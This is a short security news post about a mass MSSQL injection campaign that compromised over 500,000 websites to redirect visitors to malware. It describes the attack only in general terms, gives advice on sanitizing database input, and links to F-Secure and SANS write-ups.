Another mass hack – MSSQL injection compromises 500’000+ web sites

A simple SQL injection has resulted in more than 500'000 websites being compromised. A javascript injection sends visitors from the hacked websites to other sites containing malware that attempts to infect the client.

This is yet another example of simple security errors resulting in mass hacks of websites. The attackers ultimate purpose is the installation of trojans onto end user machines. The trojans are then used in bot armies, or for collection of data, passwords and financial accounts from keystroke loggers.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means it is crucial to verify what information gets stored in, or requested from, those databases — especially if users are allowed to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, and other area of dynamic websites.

Unless that data is sanitized before it gets saved, it is impossible to control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls.


--> F-Secure Labs: Details of the hack
--> SANS ISC Infofec forum article